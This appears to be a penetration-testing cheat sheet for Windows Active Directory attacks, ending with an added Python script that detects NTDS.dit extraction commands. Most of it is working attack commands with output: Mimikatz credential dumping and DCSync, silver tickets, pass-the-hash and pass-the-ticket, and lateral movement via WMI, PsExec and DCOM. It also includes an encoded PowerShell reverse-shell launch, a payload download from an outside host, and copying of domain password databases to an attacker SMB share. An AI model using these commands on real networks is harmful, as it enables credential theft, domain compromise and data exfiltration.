Windows

SMB - 445

shares

list all shares

C:\Users\student>net view \\dc01 /all
Shared resources at \\dc01

Share name  Type  Used as  Comment

-------------------------------------------------------------------------------
ADMIN$      Disk           Remote Admin
C$          Disk           Default share
IPC$        IPC            Remote IPC
NETLOGON    Disk           Logon server share
SYSVOL      Disk           Logon server share
The command completed successfully.

Mimikatz Commands

#save all output in a file
log

silver ticket

kerberos::golden /sid:S-1-5-21-1987370270-658905905-1781884369 /domain:corp.com /ptt /target:web04.corp.com /service:http /rc4:4d28cf5252d39971419580a51484ca09 /user:jeffadmin

/sid: the SID of the domain, which we can determine with whoami /user

dumping lsass

privilege::debug
lsadump::lsa /patch

login session dump

sekurlsa::logonpasswords

dcsync

lsadump::dcsync /user:corp\dave

extract kerberos tickets

sekurlsa::tickets /export

dumping sam

#elevate priv to nt/system
token::elevate
lsadump::sam

dumping Secrets : decrypt secrets stored in the registry

token::elevate
lsadump::secrets

Extract passwords from windows Vault

vault::cred /patch
vault::list

extract cached credentials

lsadump::cache
token::revert

wdigest

sekurlsa::wdigest

one line command

.\mimikatz.exe "privilege::debug" "token::elevate" "sekurlsa::msv" "lsadump::sam" "exit"

GMSAPassword Abuse

GMSAPasswordReader.exe

.\RunasCs.exe tbrady 543BOMBOMBUNmanda -l 2 "\programdata\GMSAPasswordReader.exe --accountname delegator$"
[*] Warning: The logon for user 'tbrady' is limited. Use the flag combination --bypass-uac and --logon-type '8' to obtain a more privileged token.
Calculating hashes for Old Value
[*] Input username : delegator$
[*] Input domain : REBOUND.HTB
[*] Salt : REBOUND.HTBdelegator$
[*] rc4_hmac : 8689904D05752E977A546E201D09E724
[*] aes128_cts_hmac_sha1 : BA45C8A99C448C63FBA3C5E9C433BF51
[*] aes256_cts_hmac_sha1 : 6D0D5523515AC20557EF075F15462EEDFEC8D649A3E84DBC298FF73B7C720F72
[*] des_cbc_md5 : 3192102AC4A10EAD
Calculating hashes for Current Value
[*] Input username : delegator$
[*] Input domain : REBOUND.HTB
[*] Salt : REBOUND.HTBdelegator$
[*] rc4_hmac : E1630B0E18242439A50E9D8B5F5B7524
[*] aes128_cts_hmac_sha1 : 2498DB6793463D13F5EBEA04EFC110A0
[*] aes256_cts_hmac_sha1 : 63EFD5D889B3006863B1E22A8EB92743B1B77D19C34AA9BB379F11AB65FA9771
[*] des_cbc_md5 : 62FE0EEA868F4FCE

Lateral Movement

WMI and Winrm

wmic

wmic /node:192.168.50.73 /user:jen /password:Nexus123! process call create "calc"
Executing (Win32_Process)->Create()
Method execution successful.
Out Parameters:
instance of __PARAMETERS
{
        ProcessId = 752;
        ReturnValue = 0;
};

New-CimSessionOption

#$credential is a PSCredential object built beforehand (for example with Get-Credential)
$options = New-CimSessionOption -Protocol DCOM
$session = New-CimSession -ComputerName 192.168.50.73 -Credential $credential -SessionOption $options
$command = 'calc';

run the command

Invoke-CimMethod -CimSession $Session -ClassName Win32_Process -MethodName Create -Arguments @{CommandLine =$Command};

PSremoting

#without creds but local admin required
Enable-PSRemoting -Force

#without creds but specify hostname
Enter-PsSession -ComputerName <computer>

#authenticated Enter-PSSession
$password = ConvertTo-SecureString "Password@123" -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential("INLANEFREIGHT\forend", $password)
Enter-PSSession -ComputerName ACADEMY-EA-DB01 -Credential $cred


Invoke-Command -ComputerName <computer> -Credential <user> -ScriptBlock {whoami}

Invoke-Command -ScriptBlock {whoami;hostname} -Credential <user> -ComputerName (Get-Content .\Desktop\computerlist.txt)

Invoke-Command -FilePath <path\script.ps1> -Credential <user> -ComputerName (Get-Content .\Desktop\computerlist.txt)

#or reuse an existing session instead of -ComputerName
Invoke-Command -FilePath <path\script.ps1> -Session $sess

Runas

runas /netonly /user:<domain\user> <program>

RunasCS

Suppose we have credentials for a user who has no access to the machine over any remote protocol, and we want a session as that user without spawning a new terminal. In this case we can use RunasCs.

using the RunasCs executable

RunasCs.exe backdoor Password123 "C:/Users/Public/reverse.exe" --force-profile --logon-type 8

using the RunasCs PowerShell version

Invoke-RunasCs -Username svc_mssql -Password trustno1 -Command "whoami"

PSExec

./PsExec64.exe -i  \\FILES04 -u corp\jen -p Nexus123! cmd

PsExec v2.4 - Execute processes remotely
Copyright (C) 2001-2022 Mark Russinovich
Sysinternals - www.sysinternals.com


Microsoft Windows [Version 10.0.20348.169]
(c) Microsoft Corporation. All rights reserved.

C:\Windows\system32>hostname
FILES04

C:\Windows\system32>whoami
corp\jen

The ADMIN$ share must be accessible, since PsExec copies its service binary there.

Pass the Hash

wmiexec

wmiexec.exe -hashes :2892D26CDF84D7A70E2EB3B9F05C425E Administrator@192.168.50.73

Overpass the Hash

mimikatz # sekurlsa::pth /user:jen /domain:corp.com /ntlm:369def79d8372408bf6e93364cc93075 /run:powershell 
user    : jen
domain  : corp.com
program : powershell
impers. : no
NTLM    : 369def79d8372408bf6e93364cc93075
  |  PID  8716
  |  TID  8348
  |  LSA Process is now R/W
  |  LUID 0 ; 16534348 (00000000:00fc4b4c)
  \_ msv1_0   - data copy @ 000001F3D5C69330 : OK !
  \_ kerberos - data copy @ 000001F3D5D366C8
   \_ des_cbc_md4       -> null
   \_ des_cbc_md4       OK
   \_ des_cbc_md4       OK
   \_ des_cbc_md4       OK
   \_ des_cbc_md4       OK
   \_ des_cbc_md4       OK
   \_ des_cbc_md4       OK
   \_ *Password replace @ 000001F3D5C63B68 (32) -> null

confirm the ticket was loaded

PS C:\Windows\system32> klist

Current LogonId is 0:0x17239e

Cached Tickets: (2)

#0>     Client: jen @ CORP.COM
        Server: krbtgt/CORP.COM @ CORP.COM
        KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
        Ticket Flags 0x40e10000 -> forwardable renewable initial pre_authent name_canonicalize
        Start Time: 2/27/2023 5:27:28 (local)
        End Time:   2/27/2023 15:27:28 (local)
        Renew Time: 3/6/2023 5:27:28 (local)
        Session Key Type: RSADSI RC4-HMAC(NT)
        Cache Flags: 0x1 -> PRIMARY
        Kdc Called: DC1.corp.com

#1>     Client: jen @ CORP.COM
        Server: cifs/files04 @ CORP.COM
        KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
        Ticket Flags 0x40a10000 -> forwardable renewable pre_authent name_canonicalize
        Start Time: 2/27/2023 5:27:28 (local)
        End Time:   2/27/2023 15:27:28 (local)
        Renew Time: 3/6/2023 5:27:28 (local)
        Session Key Type: AES-256-CTS-HMAC-SHA1-96
        Cache Flags: 0
        Kdc Called: DC1.corp.com
PS C:\Windows\system32> cd C:\tools\SysinternalsSuite\
PS C:\tools\SysinternalsSuite> .\PsExec.exe \\files04 cmd

PsExec v2.4 - Execute processes remotely
Copyright (C) 2001-2022 Mark Russinovich
Sysinternals - www.sysinternals.com


Microsoft Windows [Version 10.0.20348.169]
(c) Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
corp\jen

C:\Windows\system32>hostname
FILES04

Pass the Ticket

mimikatz

mimikatz #privilege::debug
Privilege '20' OK

mimikatz #sekurlsa::tickets /export

Authentication Id : 0 ; 2037286 (00000000:001f1626)
Session           : Batch from 0
User Name         : dave
Domain            : CORP
Logon Server      : DC1
Logon Time        : 9/14/2022 6:24:17 AM
SID               : S-1-5-21-1987370270-658905905-1781884369-1103

         * Username : dave
         * Domain   : CORP.COM
         * Password : (null)

        Group 0 - Ticket Granting Service

        Group 1 - Client Ticket ?

        Group 2 - Ticket Granting Ticket
         [00000000]
           Start/End/MaxRenew: 9/14/2022 6:24:17 AM ; 9/14/2022 4:24:17 PM ; 9/21/2022 6:24:17 AM
           Service Name (02) : krbtgt ; CORP.COM ; @ CORP.COM
           Target Name  (02) : krbtgt ; CORP ; @ CORP.COM
           Client Name  (01) : dave ; @ CORP.COM ( CORP )
           Flags 40c10000    : name_canonicalize ; initial ; renewable ; forwardable ;
           Session Key       : 0x00000012 - aes256_hmac
             f0259e075fa30e8476836936647cdabc719fe245ba29d4b60528f04196745fe6
           Ticket            : 0x00000012 - aes256_hmac       ; kvno = 2        [...]
           * Saved to file [0;1f1626]-2-0-40c10000-dave@krbtgt-CORP.COM.kirbi !
...
PS C:\Tools> dir *.kirbi


    Directory: C:\Tools


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        9/14/2022   6:24 AM           1561 [0;12bd0]-0-0-40810000-dave@cifs-web04.kirbi
-a----        9/14/2022   6:24 AM           1505 [0;12bd0]-2-0-40c10000-dave@krbtgt-CORP.COM.kirbi
-a----        9/14/2022   6:24 AM           1561 [0;1c6860]-0-0-40810000-dave@cifs-web04.kirbi
-a----        9/14/2022   6:24 AM           1505 [0;1c6860]-2-0-40c10000-dave@krbtgt-CORP.COM.kirbi
-a----        9/14/2022   6:24 AM           1561 [0;1c7bcc]-0-0-40810000-dave@cifs-web04.kirbi
-a----        9/14/2022   6:24 AM           1505 [0;1c7bcc]-2-0-40c10000-dave@krbtgt-CORP.COM.kirbi
-a----        9/14/2022   6:24 AM           1561 [0;1c933d]-0-0-40810000-dave@cifs-web04.kirbi
-a----        9/14/2022   6:24 AM           1505 [0;1c933d]-2-0-40c10000-dave@krbtgt-CORP.COM.kirbi
-a----        9/14/2022   6:24 AM           1561 [0;1ca6c2]-0-0-40810000-dave@cifs-web04.kirbi
-a----        9/14/2022   6:24 AM           1505 [0;1ca6c2]-2-0-40c10000-dave@krbtgt-CORP.COM.kirbi
...
mimikatz # kerberos::ptt [0;12bd0]-0-0-40810000-dave@cifs-web04.kirbi

* File: '[0;12bd0]-0-0-40810000-dave@cifs-web04.kirbi': OK
PS C:\Tools> klist

Current LogonId is 0:0x13bca7

Cached Tickets: (1)

#0>     Client: dave @ CORP.COM
        Server: cifs/web04 @ CORP.COM
        KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
        Ticket Flags 0x40810000 -> forwardable renewable name_canonicalize
        Start Time: 9/14/2022 5:31:32 (local)
        End Time:   9/14/2022 15:31:13 (local)
        Renew Time: 9/21/2022 5:31:13 (local)
        Session Key Type: AES-256-CTS-HMAC-SHA1-96
        Cache Flags: 0
        Kdc Called:
PS C:\Tools> ls \\web04\backup


    Directory: \\web04\backup


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        9/13/2022   2:52 AM              0 backup_schemata.txt

DCOM

$dcom = [System.Activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application.1","192.168.50.73"))
$dcom.Document.ActiveView.ExecuteShellCommand("cmd",$null,"/c calc","7")

confirm on the target that the process was spawned

C:\Users\Administrator>tasklist | findstr "calc"
win32calc.exe                 4764 Services                   0     12,132 K

the same method with an encoded PowerShell command

$dcom.Document.ActiveView.ExecuteShellCommand("powershell",$null,"powershell -nop -w hidden -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQA5A...
AC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA","7")

LDAP

Determine Domain controller in a domain

nslookup -type=SRV _ldap._tcp.dc._msdcs.SKYLARK.com

DNS request timed out.
    timeout was 2 seconds.
Server:  UnKnown
Address:  10.10.181.250

_ldap._tcp.dc._msdcs.SKYLARK.com        SRV service location:
          priority       = 0
          weight         = 100
          port           = 389
          svr hostname   = dc.skylark.com
dc.skylark.com  internet address = 10.10.181.250

bloodHound

check first if we have any valid ticket on the machine

klist

#if not, run a cmd with the creds of a compromised user (loads the creds in memory)
runas /netonly /user:domain.local\user powershell
powershell -ep bypass
. .\SharpHound.ps1
Invoke-BloodHound -CollectionMethods All -zipfilename output -outputdirectory c:\

#the collector can also take explicit LDAP credentials with -ldapUsername and -ldapPassword
SharpHound.exe --CollectionMethods All --ZipFileName output.zip

Kerberos

Kerberoasting

Rubeus

.\Rubeus.exe kerberoast /outfile:hashes.kerberoast

Invoke-Kerberoast

.\Invoke-Kerberoast.ps1

Abusing GPO

. .\powerview.ps1

Get-GPO -Name "Default Domain Policy"

Get-GPPermission -Guid 31b2f340-016d-11d2-945f-00c04fb984f9 -TargetType User -TargetName anirudh

curl http://192.168.45.176:8000/SharpGPOAbuse.exe -o SharpGPOAbuse.exe

.\SharpGPOAbuse.exe --AddLocalAdmin --UserAccount anirudh --GPOName "Default Domain Policy"

gpupdate /force

Dumping ntds

wbadmin

First you need to set up an SMB server that supports NTFS.

1. Configure a Samba server with authentication

[global]
	map to guest = Bad User
	server role = standalone server
	usershare allow guests = yes
	idmap config * : backend = tdb
	interfaces = tun0
	smb ports = 445
[smb]
	comment = Samba
	path = /tmp/
	guest ok = yes
	read only = no
	browsable = yes
	force user = smbuser

2. Create a new user that matches the user in the force user parameter

adduser smbuser
smbpasswd -a smbuser

3. Test the connection from the Windows machine

net use k: \\10.10.14.3\smb /user:smbuser smbpass

4. Back up NTDS

echo "Y" | wbadmin start backup -backuptarget:\\10.10.14.3\smb -include:c:\windows\ntds

5. Next, retrieve the version of the backup.

wbadmin get versions

6. We can now restore the NTDS.dit file, specifying the backup version.

echo "Y" | wbadmin start recovery -version:10/01/2020-14:23 -itemtype:file -items:c:\windows\ntds\ntds.dit -recoverytarget:C:\ -notrestoreacl

7. We need to export the SYSTEM hive too, and transfer both this and the NTDS.dit to our local machine.

reg save HKLM\SYSTEM C:\system.hive

8. Copy the files to our Kali machine

cp ntds.dit \\10.10.14.3\smb\NTDS.dit 
cp system.hive \\10.10.14.3\smb\system.hive

9. Dump NTDS.dit

secretsdump.py -ntds NTDS.dit -system system.hive LOCAL -history

Powershell

NTDSUtil

powershell "ntdsutil.exe 'ac i ntds' 'ifm' 'create full c:\temp' q q"

#dumping ntds locally
secretsdump.py -ntds /root/ntds.dit -system /root/SYSTEM LOCAL
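
Both NTDS extraction routes above (wbadmin backup and recovery of c:\windows\ntds, ntdsutil "ifm" "create full", and the reg save of the SYSTEM hive) leave distinctive command lines in process-creation telemetry. The following Python script is an added example, not part of the original cheat sheet: it normalizes command lines from Windows event 4688 / Sysmon event 1 and matches them against rules for exactly those commands. The sample events are constructed (they mirror the commands on the page plus a benign full backup and a harmless reg query for comparison); the rule names are my own.

```python
"""Flag NTDS.dit extraction commands in process-creation telemetry.

Added example for the wbadmin and ntdsutil sections above; it is not part of
the original cheat sheet. The events below are constructed to resemble the
command-line field of Windows event 4688 / Sysmon event 1.
"""
import re


def normalize(cmdline):
    """Lower-case, drop quotes and collapse whitespace so that quoting and
    spacing variants of the same command hit the same rule."""
    cmd = cmdline.lower().replace('"', "").replace("'", "")
    return re.sub(r"\s+", " ", cmd).strip()


def _touches_ntds(cmd):
    # a path component named ntds (the directory) or the ntds.dit file itself
    return re.search(r"\\ntds(\\|\b)", cmd) is not None


# Rules match on the normalised command line only: ntdsutil is often wrapped
# in powershell.exe or cmd.exe, so the image name alone is not reliable.
RULES = [
    ("wbadmin_ntds_backup",
     lambda c: "wbadmin" in c and "start backup" in c and _touches_ntds(c)),
    ("wbadmin_ntds_recovery",
     lambda c: "wbadmin" in c and "start recovery" in c and "ntds.dit" in c),
    ("ntdsutil_ifm_dump",
     lambda c: "ntdsutil" in c and "ifm" in c.split() and "create full" in c),
    ("system_hive_export",
     lambda c: re.search(r"\breg(\.exe)? save hklm\\system\b", c) is not None),
]


def classify(cmdline):
    """Return the names of every rule the command line matches."""
    cmd = normalize(cmdline)
    return [name for name, pred in RULES if pred(cmd)]


# Constructed events: (image, command line).
SAMPLE_EVENTS = [
    (r"C:\Windows\System32\wbadmin.exe",
     r"wbadmin start backup -backuptarget:\\10.10.14.3\smb -include:c:\windows\ntds"),
    (r"C:\Windows\System32\wbadmin.exe",
     r"wbadmin start backup -backuptarget:E: -include:C: -allCritical"),
    (r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     r'''powershell "ntdsutil.exe 'ac i ntds' 'ifm' 'create full c:\temp' q q"'''),
    (r"C:\Windows\System32\reg.exe",
     r"reg save HKLM\SYSTEM C:\system.hive"),
    (r"C:\Windows\System32\reg.exe",
     r"reg query HKLM\SYSTEM\CurrentControlSet\Services\Tcpip"),
]


def scan(events):
    """Return (image file name, matched rules) for every event that hits a rule."""
    hits = []
    for image, cmdline in events:
        rules = classify(cmdline)
        if rules:
            hits.append((image.rsplit("\\", 1)[-1].lower(), rules))
    return hits


if __name__ == "__main__":
    for image, rules in scan(SAMPLE_EVENTS):
        print(image, rules)
```

The backup rule keys on the ntds path rather than on wbadmin itself because scheduled full-volume backups are normal on domain controllers; a backup target that is a remote UNC share (as in the command above) is an additional signal worth surfacing separately. Pair the wbadmin and ntdsutil rules with an alert on new files named ntds.dit written outside C:\Windows\NTDS to catch the recovery step even when command-line logging is incomplete.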

Last updated 21 days ago
